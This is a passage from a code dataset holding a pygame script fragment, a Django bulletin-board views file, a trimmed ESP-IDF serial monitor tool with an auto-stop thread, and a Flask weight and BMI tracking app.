pygame.display.update()\n","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":2959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"456220600","text":"from django.core.paginator import Paginator, EmptyPage, InvalidPage, PageNotAnInteger\nfrom django.db.models import F\nfrom django.db.models.functions import math\nfrom django.http import HttpResponse , HttpResponseRedirect\nfrom django.shortcuts import render, get_object_or_404, redirect, render_to_response\nfrom django.template import loader, RequestContext\nfrom django.utils import timezone\nfrom django.views import generic\nfrom .models import Post\n\n\ndef post_list(request): # 리스트\n queryset_list = Post.objects.all()\n paginator = Paginator(queryset_list, 5)\n\n page = request.GET.get('page')\n try:\n queryset = paginator.page(page)\n except PageNotAnInteger:\n queryset = paginator.page(1)\n except EmptyPage:\n queryset = paginator.page(paginator.num_pages)\n\n context = {\n \"object_list\": queryset, \"title\": queryset_list\n }\n\n return render(request, \"bbs/index.html\", context)\n\ndef post_detail(request, pk): # 상세보기\n wathing = get_object_or_404(Post, id=pk)\n writing = Post.objects.filter(id=pk)\n writing.update(post_hits=F('post_hits')+1) # 조회수 증가\n return render(request, 'bbs/detail.html', {'writing': writing[0], 'wathing':wathing,})\n\n\nclass WriteView(generic.DetailView): #수정화면\n def update_write(request, post_id):\n writing = get_object_or_404(Post, pk=post_id)\n return render(request, 'bbs/update.html', {'writing': writing})\n\n model = Post\n template_name = 'bbs/update.html'\n context_object_name = 'write'\n\ndef writing(request): # 게시글 추가\n post = Post()\n post.writer = request.POST['writer']\n post.post_title = request.POST['title']\n post.post_contents = request.POST['body']\n post.post_date = timezone.datetime.now()\n post.save()\n\n return redirect('/bbs/' + str(post.id))\n\ndef new(request): # 게시글 추가화면\n return render(request, 'bbs/new.html')\n\ndef create(request): # 게시글 추가\n post = Post()\n post.writer = request.GET['writer']\n post.post_title = request.GET['title']\n post.post_contents = request.GET['body']\n post.post_date = timezone.datetime.now()\n post.post_hits = 0\n post.save()\n return redirect('/bbs/' + str(post.id))\n\ndef delete(request, post_id): #삭제 # 게시글 삭제\n post = Post.objects.get(id=post_id)\n post.delete()\n return redirect('/bbs/')\n\ndef modify(request, post_id): # 게시글 수정\n if request.method ==\"POST\":\n try:\n post = get_object_or_404(Post, id=post_id)\n post.writer = request.POST.get(\"name\")\n post.post_title = request.POST.get(\"title\")\n post.post_contents = request.POST.get(\"body\")\n post.post_date = timezone.datetime.now()\n print(\"post_writer\")\n post.save()\n except Exception as e:\n print(\"modify err\", e)\n\n return HttpResponseRedirect(\"/bbs/\")\n\n\n\n","sub_path":"board/bbs/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"228071190","text":"from __future__ import division, print_function, unicode_literals\n\nimport argparse\nimport codecs\nimport datetime\nimport os\nimport re\nimport subprocess\nimport time\nfrom builtins import bytes, chr, object\n\ntry:\n import queue\nexcept ImportError:\n import Queue as queue\n\nimport ctypes\nimport json\nimport shlex\nimport sys\nimport tempfile\nimport textwrap\nimport threading\nimport time\nimport types\nfrom distutils.version import StrictVersion\nfrom io import open\n\nimport serial\nimport serial.tools.list_ports\nimport serial.tools.miniterm as miniterm\n\nkey_description = miniterm.key_description\n\n# Control-key characters\nCTRL_A = '\\x01'\nCTRL_B = '\\x02'\nCTRL_F = '\\x06'\nCTRL_H = '\\x08'\nCTRL_R = '\\x12'\nCTRL_T = '\\x14'\nCTRL_Y = '\\x19'\nCTRL_P = '\\x10'\nCTRL_X = '\\x18'\nCTRL_L = '\\x0c'\nCTRL_RBRACKET = '\\x1d' # Ctrl+]\n\n# Command parsed from console inputs\nCMD_STOP = 1\nCMD_RESET = 2\nCMD_MAKE = 3\nCMD_APP_FLASH = 4\nCMD_OUTPUT_TOGGLE = 5\nCMD_TOGGLE_LOGGING = 6\nCMD_ENTER_BOOT = 7\n\n# ANSI terminal codes (if changed, regular expressions in LineMatcher need to be udpated)\nANSI_RED = '\\033[1;31m'\nANSI_YELLOW = '\\033[0;33m'\nANSI_NORMAL = '\\033[0m'\n\n\ndef color_print(message, color, newline='\\n'):\n \"\"\" Print a message to stderr with colored highlighting \"\"\"\n sys.stderr.write('%s%s%s%s' % (color, message, ANSI_NORMAL, newline))\n\n\ndef yellow_print(message, newline='\\n'):\n color_print(message, ANSI_YELLOW, newline)\n\n\ndef red_print(message, newline='\\n'):\n color_print(message, ANSI_RED, newline)\n\n\n__version__ = '1.1'\n\n# Tags for tuples in queues\nTAG_KEY = 0\nTAG_SERIAL = 1\nTAG_SERIAL_FLUSH = 2\nTAG_CMD = 3\n\n# regex matches an potential PC value (0x4xxxxxxx)\nMATCH_PCADDR = re.compile(r'0x4[0-9a-f]{7}', re.IGNORECASE)\n\nDEFAULT_TOOLCHAIN_PREFIX = 'xtensa-esp32-elf-'\n\nDEFAULT_PRINT_FILTER = ''\n\nclass StoppableThread(object):\n \"\"\"\n Provide a Thread-like class which can be 'cancelled' via a subclass-provided\n cancellation method.\n\n Can be started and stopped multiple times.\n\n Isn't an instance of type Thread because Python Thread objects can only be run once\n \"\"\"\n def __init__(self):\n self._thread = None\n\n @property\n def alive(self):\n \"\"\"\n Is 'alive' whenever the internal thread object exists\n \"\"\"\n return self._thread is not None\n\n def start(self):\n if self._thread is None:\n self._thread = threading.Thread(target=self._run_outer)\n self._thread.start()\n\n def _cancel(self):\n pass # override to provide cancellation functionality\n\n def run(self):\n pass # override for the main thread behaviour\n\n def _run_outer(self):\n try:\n self.run()\n finally:\n self._thread = None\n\n def stop(self):\n if self._thread is not None:\n old_thread = self._thread\n self._thread = None\n self._cancel()\n old_thread.join()\n\nclass Killer(threading.Thread):\n def __init__(self, q):\n threading.Thread.__init__(self)\n self.q = q\n\n def run(self):\n time.sleep(5)\n # Seppuku!\n self.q.put((TAG_CMD, CMD_STOP))\n\nclass ConsoleReader(StoppableThread):\n \"\"\" Read input keys from the console and push them to the queue,\n until stopped.\n \"\"\"\n def __init__(self, console, event_queue, cmd_queue, parser):\n super(ConsoleReader, self).__init__()\n self.console = console\n self.event_queue = event_queue\n self.cmd_queue = cmd_queue\n self.parser = parser\n\n def run(self):\n self.console.setup()\n try:\n while self.alive:\n try:\n c = self.console.getkey()\n except KeyboardInterrupt:\n c = '\\x03'\n if c is not None:\n ret = self.parser.parse(c)\n if ret is not None:\n (tag, cmd) = ret\n # stop command should be executed last\n if tag == TAG_CMD and cmd != CMD_STOP:\n self.cmd_queue.put(ret)\n else:\n self.event_queue.put(ret)\n\n finally:\n self.console.cleanup()\n\n def _cancel(self):\n import fcntl\n import termios\n fcntl.ioctl(self.console.fd, termios.TIOCSTI, b'\\0')\n\n\nclass ConsoleParser(object):\n\n def __init__(self, eol='CRLF'):\n self.translate_eol = {\n 'CRLF': lambda c: c.replace('\\n', '\\r\\n'),\n 'CR': lambda c: c.replace('\\n', '\\r'),\n 'LF': lambda c: c.replace('\\r', '\\n'),\n }[eol]\n self.menu_key = CTRL_T\n self.exit_key = CTRL_RBRACKET\n self._pressed_menu_key = False\n\n def parse(self, key):\n ret = None\n if self._pressed_menu_key:\n ret = self._handle_menu_key(key)\n elif key == self.menu_key:\n self._pressed_menu_key = True\n elif key == self.exit_key:\n ret = (TAG_CMD, CMD_STOP)\n else:\n key = self.translate_eol(key)\n ret = (TAG_KEY, key)\n return ret\n\n def _handle_menu_key(self, c):\n ret = None\n if c == self.exit_key or c == self.menu_key: # send verbatim\n ret = (TAG_KEY, c)\n elif c in [CTRL_H, 'h', 'H', '?']:\n red_print(self.get_help_text())\n elif c == CTRL_R: # Reset device via RTS\n ret = (TAG_CMD, CMD_RESET)\n elif c == CTRL_F: # Recompile & upload\n ret = (TAG_CMD, CMD_MAKE)\n elif c in [CTRL_A, 'a', 'A']: # Recompile & upload app only\n # \"CTRL-A\" cannot be captured with the default settings of the Windows command line, therefore, \"A\" can be used\n # instead\n ret = (TAG_CMD, CMD_APP_FLASH)\n elif c == CTRL_Y: # Toggle output display\n ret = (TAG_CMD, CMD_OUTPUT_TOGGLE)\n elif c == CTRL_L: # Toggle saving output into file\n ret = (TAG_CMD, CMD_TOGGLE_LOGGING)\n elif c == CTRL_P:\n yellow_print('Pause app (enter bootloader mode), press Ctrl-T Ctrl-R to restart')\n # to fast trigger pause without press menu key\n ret = (TAG_CMD, CMD_ENTER_BOOT)\n elif c in [CTRL_X, 'x', 'X']: # Exiting from within the menu\n ret = (TAG_CMD, CMD_STOP)\n else:\n red_print('--- unknown menu character {} --'.format(key_description(c)))\n\n self._pressed_menu_key = False\n return ret\n\n def get_help_text(self):\n text = \"\"\"\\\n --- idf_monitor ({version}) - ESP-IDF monitor tool\n --- based on miniterm from pySerial\n ---\n --- {exit:8} Exit program\n --- {menu:8} Menu escape key, followed by:\n --- Menu keys:\n --- {menu:14} Send the menu character itself to remote\n --- {exit:14} Send the exit character itself to remote\n --- {reset:14} Reset target board via RTS line\n --- {makecmd:14} Build & flash project\n --- {appmake:14} Build & flash app only\n --- {output:14} Toggle output display\n --- {log:14} Toggle saving output into file\n --- {pause:14} Reset target into bootloader to pause app via RTS line\n --- {menuexit:14} Exit program\n \"\"\".format(version=__version__,\n exit=key_description(self.exit_key),\n menu=key_description(self.menu_key),\n reset=key_description(CTRL_R),\n makecmd=key_description(CTRL_F),\n appmake=key_description(CTRL_A) + ' (or A)',\n output=key_description(CTRL_Y),\n log=key_description(CTRL_L),\n pause=key_description(CTRL_P),\n menuexit=key_description(CTRL_X) + ' (or X)')\n return textwrap.dedent(text)\n\n def get_next_action_text(self):\n text = \"\"\"\\\n --- Press {} to exit monitor.\n --- Press {} to build & flash project.\n --- Press {} to build & flash app.\n --- Press any other key to resume monitor (resets target).\n \"\"\".format(key_description(self.exit_key),\n key_description(CTRL_F),\n key_description(CTRL_A))\n return textwrap.dedent(text)\n\n def parse_next_action_key(self, c):\n ret = None\n if c == self.exit_key:\n ret = (TAG_CMD, CMD_STOP)\n elif c == CTRL_F: # Recompile & upload\n ret = (TAG_CMD, CMD_MAKE)\n elif c in [CTRL_A, 'a', 'A']: # Recompile & upload app only\n # \"CTRL-A\" cannot be captured with the default settings of the Windows command line, therefore, \"A\" can be used\n # instead\n ret = (TAG_CMD, CMD_APP_FLASH)\n return ret\n\n\nclass SerialReader(StoppableThread):\n \"\"\" Read serial data from the serial port and push to the\n event queue, until stopped.\n \"\"\"\n def __init__(self, serial, event_queue):\n super(SerialReader, self).__init__()\n self.baud = serial.baudrate\n self.serial = serial\n self.event_queue = event_queue\n if not hasattr(self.serial, 'cancel_read'):\n # enable timeout for checking alive flag,\n # if cancel_read not available\n self.serial.timeout = 0.25\n\n def run(self):\n if not self.serial.is_open:\n self.serial.baudrate = self.baud\n self.serial.rts = True # Force an RTS reset on open\n self.serial.open()\n time.sleep(0.005) # Add a delay to meet the requirements of minimal EN low time (2ms for ESP32-C3)\n self.serial.rts = False\n self.serial.dtr = self.serial.dtr # usbser.sys workaround\n try:\n while self.alive:\n try:\n data = self.serial.read(self.serial.in_waiting or 1)\n except (serial.serialutil.SerialException, IOError) as e:\n data = b''\n # self.serial.open() was successful before, therefore, this is an issue related to\n # the disappearance of the device\n red_print(e)\n yellow_print('Waiting for the device to reconnect', newline='')\n self.serial.close()\n while self.alive: # so that exiting monitor works while waiting\n try:\n time.sleep(0.5)\n self.serial.open()\n break # device connected\n except serial.serialutil.SerialException:\n yellow_print('.', newline='')\n sys.stderr.flush()\n yellow_print('') # go to new line\n if len(data):\n self.event_queue.put((TAG_SERIAL, data), False)\n finally:\n self.serial.close()\n\n def _cancel(self):\n if hasattr(self.serial, 'cancel_read'):\n try:\n self.serial.cancel_read()\n except Exception:\n pass\n\n\nclass LineMatcher(object):\n \"\"\"\n Assembles a dictionary of filtering rules based on the --print_filter\n argument of idf_monitor. Then later it is used to match lines and\n determine whether they should be shown on screen or not.\n \"\"\"\n LEVEL_N = 0\n LEVEL_E = 1\n LEVEL_W = 2\n LEVEL_I = 3\n LEVEL_D = 4\n LEVEL_V = 5\n\n level = {'N': LEVEL_N, 'E': LEVEL_E, 'W': LEVEL_W, 'I': LEVEL_I, 'D': LEVEL_D,\n 'V': LEVEL_V, '*': LEVEL_V, '': LEVEL_V}\n\n def __init__(self, print_filter):\n self._dict = dict()\n self._re = re.compile(r'^(?:\\033\\[[01];?[0-9]+m?)?([EWIDV]) \\([0-9]+\\) ([^:]+): ')\n items = print_filter.split()\n if len(items) == 0:\n self._dict['*'] = self.LEVEL_V # default is to print everything\n for f in items:\n s = f.split(r':')\n if len(s) == 1:\n # specifying no warning level defaults to verbose level\n lev = self.LEVEL_V\n elif len(s) == 2:\n if len(s[0]) == 0:\n raise ValueError('No tag specified in filter ' + f)\n try:\n lev = self.level[s[1].upper()]\n except KeyError:\n raise ValueError('Unknown warning level in filter ' + f)\n else:\n raise ValueError('Missing \":\" in filter ' + f)\n self._dict[s[0]] = lev\n\n def match(self, line):\n try:\n m = self._re.search(line)\n if m:\n lev = self.level[m.group(1)]\n if m.group(2) in self._dict:\n return self._dict[m.group(2)] >= lev\n return self._dict.get('*', self.LEVEL_N) >= lev\n except (KeyError, IndexError):\n # Regular line written with something else than ESP_LOG*\n # or an empty line.\n pass\n # We need something more than \"*.N\" for printing.\n return self._dict.get('*', self.LEVEL_N) > self.LEVEL_N\n\n\nclass SerialStopException(Exception):\n \"\"\"\n This exception is used for stopping the IDF monitor in testing mode.\n \"\"\"\n pass\n\n\nclass Monitor(object):\n \"\"\"\n Monitor application main class.\n\n This was originally derived from miniterm.Miniterm, but it turned out to be easier to write from scratch for this\n purpose.\n\n Main difference is that all event processing happens in the main thread, not the worker threads.\n \"\"\"\n def __init__(self, serial_instance):\n super(Monitor, self).__init__()\n self.event_queue = queue.Queue()\n self.cmd_queue = queue.Queue()\n self.console = miniterm.Console()\n self.enable_address_decoding = False\n\n if StrictVersion(serial.VERSION) < StrictVersion('3.3.0'):\n # Use Console.getkey implementation from 3.3.0 (to be in sync with the ConsoleReader._cancel patch above)\n def getkey_patched(self):\n c = self.enc_stdin.read(1)\n if c == chr(0x7f):\n c = chr(8) # map the BS key (which yields DEL) to backspace\n return c\n\n self.console.getkey = types.MethodType(getkey_patched, self.console)\n\n self.serial = serial_instance\n self.console_parser = ConsoleParser('CRLF')\n self.console_reader = ConsoleReader(self.console, self.event_queue, self.cmd_queue, self.console_parser)\n self.serial_reader = SerialReader(self.serial, self.event_queue)\n self.killer = Killer(self.event_queue)\n self.elf_file = None\n self.make = ''\n self.encrypted = ''\n self.toolchain_prefix = ''\n self.websocket_client = None\n #self.target = target\n\n # internal state\n self._last_line_part = b''\n self._line_matcher = LineMatcher('')\n self._invoke_processing_last_line_timer = None\n self._force_line_print = False\n self._output_enabled = True\n self._log_file = None\n\n def invoke_processing_last_line(self):\n self.event_queue.put((TAG_SERIAL_FLUSH, b''), False)\n\n def main_loop(self):\n self.console_reader.start()\n self.serial_reader.start()\n self.killer.start()\n started = time.time()\n try:\n while self.console_reader.alive and self.serial_reader.alive:\n try:\n item = self.cmd_queue.get_nowait()\n if time.time() - started > 10:\n print(\"Hammerzeit!\")\n self.console_reader.stop()\n self.serial_reader.stop()\n except queue.Empty:\n try:\n item = self.event_queue.get(True, 0.03)\n except queue.Empty:\n continue\n (event_tag, data) = item\n if event_tag == TAG_CMD:\n self.handle_commands(data)\n elif event_tag == TAG_KEY:\n try:\n self.serial.write(codecs.encode(data))\n except serial.SerialException:\n pass # this shouldn't happen, but sometimes port has closed in serial thread\n except UnicodeEncodeError:\n pass # this can happen if a non-ascii character was passed, ignoring\n elif event_tag == TAG_SERIAL:\n self.handle_serial_input(data)\n if self._invoke_processing_last_line_timer is not None:\n self._invoke_processing_last_line_timer.cancel()\n self._invoke_processing_last_line_timer = threading.Timer(0.1, self.invoke_processing_last_line)\n self._invoke_processing_last_line_timer.start()\n # If no further data is received in the next short period\n # of time then the _invoke_processing_last_line_timer\n # generates an event which will result in the finishing of\n # the last line. This is fix for handling lines sent\n # without EOL.\n elif event_tag == TAG_SERIAL_FLUSH:\n self.handle_serial_input(data, finalize_line=True)\n else:\n raise RuntimeError('Bad event data %r' % ((event_tag,data),))\n except SerialStopException:\n sys.stderr.write(ANSI_NORMAL + 'Stopping condition has been received\\n')\n finally:\n try:\n self.console_reader.stop()\n self.serial_reader.stop()\n self.stop_logging()\n # Cancelling _invoke_processing_last_line_timer is not\n # important here because receiving empty data doesn't matter.\n self._invoke_processing_last_line_timer = None\n except Exception:\n pass\n sys.stderr.write(ANSI_NORMAL + '\\n')\n\n def handle_serial_input(self, data, finalize_line=False):\n sp = data.split(b'\\n')\n if self._last_line_part != b'':\n # add unprocessed part from previous \"data\" to the first line\n sp[0] = self._last_line_part + sp[0]\n self._last_line_part = b''\n if sp[-1] != b'':\n # last part is not a full line\n self._last_line_part = sp.pop()\n for line in sp:\n if line != b'':\n if line == self.console_parser.exit_key.encode('latin-1'):\n raise SerialStopException()\n if self._force_line_print or self._line_matcher.match(line.decode(errors='ignore')):\n self._print(line + b'\\n')\n self._force_line_print = False\n # Now we have the last part (incomplete line) in _last_line_part. By\n # default we don't touch it and just wait for the arrival of the rest\n # of the line. But after some time when we didn't received it we need\n # to make a decision.\n if self._last_line_part != b'':\n if self._force_line_print or (finalize_line and self._line_matcher.match(self._last_line_part.decode(errors='ignore'))):\n self._force_line_print = True\n self._print(self._last_line_part)\n self._last_line_part = b''\n # else: keeping _last_line_part and it will be processed the next time\n # handle_serial_input is invoked\n\n def __enter__(self):\n \"\"\" Use 'with self' to temporarily disable monitoring behaviour \"\"\"\n self.serial_reader.stop()\n self.console_reader.stop()\n\n def __exit__(self, *args, **kwargs):\n \"\"\" Use 'with self' to temporarily disable monitoring behaviour \"\"\"\n self.console_reader.start()\n self.serial_reader.start()\n\n def prompt_next_action(self, reason):\n self.console.setup() # set up console to trap input characters\n try:\n red_print('--- {}'.format(reason))\n red_print(self.console_parser.get_next_action_text())\n\n k = CTRL_T # ignore CTRL-T here, so people can muscle-memory Ctrl-T Ctrl-F, etc.\n while k == CTRL_T:\n k = self.console.getkey()\n finally:\n self.console.cleanup()\n ret = self.console_parser.parse_next_action_key(k)\n if ret is not None:\n cmd = ret[1]\n if cmd == CMD_STOP:\n # the stop command should be handled last\n self.event_queue.put(ret)\n else:\n self.cmd_queue.put(ret)\n\n def output_enable(self, enable):\n self._output_enabled = enable\n\n def output_toggle(self):\n self._output_enabled = not self._output_enabled\n yellow_print('\\nToggle output display: {}, Type Ctrl-T Ctrl-Y to show/disable output again.'.format(self._output_enabled))\n\n def toggle_logging(self):\n if self._log_file:\n self.stop_logging()\n else:\n self.start_logging()\n\n def start_logging(self):\n if not self._log_file:\n try:\n name = 'log.{}.{}.txt'.format(os.path.splitext(os.path.basename(self.elf_file))[0],\n datetime.datetime.now().strftime('%Y%m%d%H%M%S'))\n self._log_file = open(name, 'wb+')\n yellow_print('\\nLogging is enabled into file {}'.format(name))\n except Exception as e:\n red_print('\\nLog file {} cannot be created: {}'.format(name, e))\n\n def stop_logging(self):\n if self._log_file:\n try:\n name = self._log_file.name\n self._log_file.close()\n yellow_print('\\nLogging is disabled and file {} has been closed'.format(name))\n except Exception as e:\n red_print('\\nLog file cannot be closed: {}'.format(e))\n finally:\n self._log_file = None\n\n def _print(self, string, console_printer=None):\n if console_printer is None:\n console_printer = self.console.write_bytes\n if self._output_enabled:\n console_printer(string)\n if self._log_file:\n try:\n if isinstance(string, type(u'')):\n string = string.encode()\n self._log_file.write(string)\n except Exception as e:\n red_print('\\nCannot write to file: {}'.format(e))\n # don't fill-up the screen with the previous errors (probably consequent prints would fail also)\n self.stop_logging()\n\n def handle_commands(self, cmd):\n if cmd == CMD_STOP:\n self.console_reader.stop()\n self.serial_reader.stop()\n elif cmd == CMD_RESET:\n self.serial.setRTS(True)\n self.serial.setDTR(self.serial.dtr) # usbser.sys workaround\n time.sleep(0.2)\n self.serial.setRTS(False)\n self.serial.setDTR(self.serial.dtr) # usbser.sys workaround\n self.output_enable(True)\n elif cmd == CMD_OUTPUT_TOGGLE:\n self.output_toggle()\n elif cmd == CMD_ENTER_BOOT:\n self.serial.setDTR(False) # IO0=HIGH\n self.serial.setRTS(True) # EN=LOW, chip in reset\n self.serial.setDTR(self.serial.dtr) # usbser.sys workaround\n time.sleep(1.3) # timeouts taken from esptool.py, includes esp32r0 workaround. defaults: 0.1\n self.serial.setDTR(True) # IO0=LOW\n self.serial.setRTS(False) # EN=HIGH, chip out of reset\n self.serial.setDTR(self.serial.dtr) # usbser.sys workaround\n time.sleep(0.45) # timeouts taken from esptool.py, includes esp32r0 workaround. defaults: 0.05\n self.serial.setDTR(False) # IO0=HIGH, done\n else:\n raise RuntimeError('Bad command data %d' % (cmd))\n\n\ndef main():\n parser = argparse.ArgumentParser('idf_monitor - a serial output monitor for esp-idf')\n\n parser.add_argument(\n '--port', '-p',\n help='Serial port device',\n default=os.environ.get('ESPTOOL_PORT', '/dev/ttyUSB0')\n )\n\n parser.add_argument(\n '--baud', '-b',\n help='Serial port baud rate',\n type=int,\n default=os.getenv('IDF_MONITOR_BAUD', os.getenv('MONITORBAUD', 115200)))\n\n args = parser.parse_args()\n\n serial_instance = serial.Serial()\n serial_instance.port = args.port\n serial_instance.baudrate = args.baud\n serial_instance.dtr = False\n serial_instance.rts = False\n\n monitor = Monitor(serial_instance)\n\n monitor.main_loop()\n\nif __name__ == '__main__':\n main()\n","sub_path":"ui/idf_monitor.py","file_name":"idf_monitor.py","file_ext":"py","file_size_in_byte":24727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"205166604","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom flask import Flask, render_template, request, make_response, send_file\nfrom flask_table import Table, Col, LinkCol\nimport datetime, os, pathlib\nfrom datetime import datetime as dt\nfrom dateutil.relativedelta import relativedelta\nfrom logging import DEBUG\nfrom util.dateUtil import conv_str_datetime\nfrom util.dateUtil import get_one_month_before\nfrom util.dateUtil import conv_str_to_date\nfrom util.dateUtil import conv_str_to_datetime\nfrom util.loggingUtil import get_handler\nimport jaconv\nfrom lib import com\nfrom lib import com_db\nfrom lib import com_health\n\napp = Flask(__name__)\ndb_util = None\nhealth = None\nheight = 0.0\ntarget_weight = 0\n\ndt_today = datetime.datetime.today()\ncurrent_dir = pathlib.Path(__file__).resolve().parent\n\n# 設定ファイル読み込み\nsettings = com.get_settings(current_dir)\nheight = float(settings[\"height\"])\ntarget_weight = float(settings[\"target_weight\"])\n\n# グラフ用画像ファイル名設定\npng_file_name = os.path.join(current_dir, settings[\"png_file_name\"])\n\n# DBファイル準備\ndb_file = os.path.join(current_dir, settings[\"db_file\"])\n\n# DB管理クラスインスタンス化\ndb_util = com_db.DbUtil(db_file)\n\n# ロガー準備\nlog_filename = os.path.join(current_dir, settings[\"log_filename\"])\nhandler = get_handler(__name__, log_filename)\napp.logger.addHandler(handler)\napp.logger.setLevel(DEBUG)\napp.logger.info('start:' + dt_today.strftime('%Y/%m/%d %H:%M:%S'))\n\n@app.route('/', methods=['GET'])\ndef get_index():\n return get_list()\n\n@app.route('/list', methods=['GET','POST'])\ndef get_list():\n \"\"\"\n 一覧表示\n \"\"\"\n page = 1\n LIMIT = 15\n offset = 0\n before_day_flag = False\n next_day_flag = False\n if request.method == 'POST':\n page = int(request.form['page'])\n navi = request.form['navi']\n print(\"navi:\" + navi)\n if navi == 'before':\n page += 1\n else:\n page -= 1\n\n offset = page * LIMIT - LIMIT\n list = db_util.select_range(LIMIT, offset)\n\n # 操作ボタン制御\n dt_format = '%Y-%m-%d %H:%M:%S'\n dt_format_list = '%Y年%m月%d日 %H:%M'\n\n if len(list) > 0:\n str_newest_regist = db_util.select_newest_regist_datetime()\n dt_newest_regist = conv_str_to_datetime(str_newest_regist, dt_format)\n dt_list_max = conv_str_to_datetime(list[0].regist_datetime, dt_format_list)\n if dt_newest_regist <= dt_list_max:\n next_day_flag = False\n else:\n next_day_flag = True\n\n str_oldest_regist = db_util.select_oldest_regist_datetime()\n dt_oldest_regist = conv_str_to_datetime(str_oldest_regist, dt_format)\n dt_list_min = conv_str_to_datetime(list[-1].regist_datetime, dt_format_list)\n if dt_oldest_regist >= dt_list_min:\n before_day_flag = False\n else:\n before_day_flag = True\n\n return render_template('web_health_list.html', list=list, page=page\n , before_day_flag=before_day_flag, next_day_flag=next_day_flag)\n\n@app.route('/detail/', methods=['GET'])\ndef get_detail(id):\n \"\"\"\n 詳細表示\n \"\"\"\n health = db_util.select_by_key(id)\n return render_template('web_health_detail.html', health=health)\n\n@app.route('/new', methods=['GET'])\ndef new():\n \"\"\"\n 新規登録画面へ遷移\n \"\"\"\n str_regist = datetime.datetime.today().strftime('%Y-%m-%dT%H:%M')\n return render_template('web_health_new.html', regist_datetime=str_regist, health=health, height=height)\n\n@app.route('/save', methods=['POST'])\ndef save():\n \"\"\"\n 新規登録\n \"\"\"\n if request.method == 'POST':\n # 前回最新データ取得\n before_data = db_util.select_by_key(db_util.select_max_id())\n before = before_data.weight\n\n # 登録\n health = new_health(request)\n db_util.save(health)\n new_data = db_util.select_by_key(db_util.select_max_seq(\"health\"))\n health = db_util.select_by_key(new_data.data_id)\n\n # 結果を取得\n result_list = com_health.get_result_list(health.height, health.weight, target_weight, before)\n\n return render_template('web_health_new.html', health=health, result_list=result_list)\n\ndef new_health(request):\n \"\"\"\n 新しいレコードを作成\n \"\"\"\n data_id = 0\n dt_regist = dt.strptime(request.form['regist_datetime'], '%Y-%m-%dT%H:%M') if 'regist_datetime' in request.form else datetime.datetime.today()\n weight = request.form['weight'] if 'weight' in request.form else 0.0\n weight = jaconv.z2h(weight, kana=False, ascii=True, digit=True)\n\n # BMIを計算\n bmi = com_health.calc_bmi(float(height), float(weight))\n\n # インスタンス生成\n return com_db.Health(data_id, dt_regist, height, weight, bmi)\n\n@app.route('/edit/', methods=['GET'])\ndef edit(id):\n \"\"\"\n 編集表示\n \"\"\"\n health = db_util.select_by_key(id)\n dt_regist = dt.strptime(health.regist_datetime, '%Y年%m月%d日 %H:%M')\n health.regist_datetime = dt_regist.strftime('%Y-%m-%dT%H:%M')\n return render_template('web_health_edit.html', health=health)\n\n@app.route('/update', methods=['POST'])\ndef update():\n \"\"\"\n 更新\n \"\"\"\n if request.method == 'POST':\n # 更新\n data_id = request.form['data_id']\n dt_regist = dt.strptime(request.form['regist_datetime'], '%Y-%m-%dT%H:%M')\n height = request.form['height']\n weight = request.form['weight']\n weight = jaconv.z2h(weight, kana=False, ascii=True, digit=True)\n\n # BMIを再度計算\n bmi = com_health.calc_bmi(float(height), float(weight))\n\n health = com_db.Health(data_id, dt_regist, height, weight, bmi)\n db_util.update(health)\n health = db_util.select_by_key(data_id)\n return render_template('web_health_detail.html', health=health, done_flg=1)\n\n@app.route('/delete/', methods=['GET'])\ndef delete(id):\n \"\"\"\n 削除\n \"\"\"\n db_util.delete_by_key(id)\n return get_list()\n\n@app.route('/navi', methods=['POST'])\ndef navi():\n \"\"\"\n グラフ画面・前へ/次へ\n \"\"\"\n if request.method == 'POST':\n to_date = request.form['to_date']\n navi = request.form['navi']\n\n if navi == 'before_day':\n rd = relativedelta(days=-1)\n elif navi == 'before_month':\n rd = relativedelta(months=-1)\n elif navi == 'next_month':\n rd = relativedelta(months=1)\n else:\n rd = relativedelta(days=1)\n\n dt_to_date = dt.strptime(to_date, '%Y-%m-%d') + rd\n dt_from_date = get_one_month_before(dt_to_date)\n\n # グラフ画面へ遷移\n return disp_graph(dt_from_date, dt_to_date)\n\n@app.route('/graph', methods=['GET', 'POST'])\ndef graph():\n \"\"\"\n グラフ画面へ遷移\n \"\"\"\n if request.method == 'POST':\n dt_from_date = dt.strptime(request.form['from_date'], '%Y-%m-%d')\n dt_to_date = dt.strptime(request.form['to_date'], '%Y-%m-%d') \n else:\n str_newest_regist = db_util.select_newest_regist_datetime()\n dt_to_date = conv_str_to_datetime(str_newest_regist, '%Y-%m-%d %H:%M:%S')\n dt_from_date = get_one_month_before(dt_to_date)\n\n # グラフ画面へ遷移\n return disp_graph(dt_from_date, dt_to_date)\n\ndef disp_graph(dt_from_date, dt_to_date):\n \"\"\"\n グラフ画面へ遷移\n \"\"\"\n from_date = dt_from_date.strftime('%Y-%m-%d')\n to_date = dt_to_date.strftime('%Y-%m-%d')\n data = db_util.select_for_graph(from_date, to_date)\n title = db_util.get_disp_min_max_avg(from_date, to_date)\n graph_data = com_health.save_graph(data, title, png_file_name, target_weight)\n\n # 操作ボタン制御\n dt_format = '%Y-%m-%d'\n str_newest_regist = db_util.select_newest_regist_datetime()\n date_newest_regist = conv_str_to_date(str_newest_regist, dt_format)\n date_to_date = conv_str_to_date(to_date, dt_format)\n if date_newest_regist > date_to_date:\n next_day_flag = True\n next_month_flag = True\n else:\n next_day_flag = False\n next_month_flag = False\n\n str_oldest_regist = db_util.select_oldest_regist_datetime()\n date_oldest_regist = conv_str_to_date(str_oldest_regist, dt_format)\n date_from_date = conv_str_to_date(from_date, dt_format)\n if date_oldest_regist < date_from_date:\n before_day_flag = True\n before_month_flag = True\n else:\n before_day_flag = False\n before_month_flag = False\n\n # グラフ画面へ遷移\n return render_template('web_health_graph.html', graph_data=graph_data\n , from_date=from_date, to_date=to_date\n , before_day_flag=before_day_flag, next_day_flag=next_day_flag\n , before_month_flag=before_month_flag, next_month_flag=next_month_flag)\n","sub_path":"06_DB操作系/健康管理_Docker/healthcare/web_health_manage.py","file_name":"web_health_manage.py","file_ext":"py","file_size_in_byte":8771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} 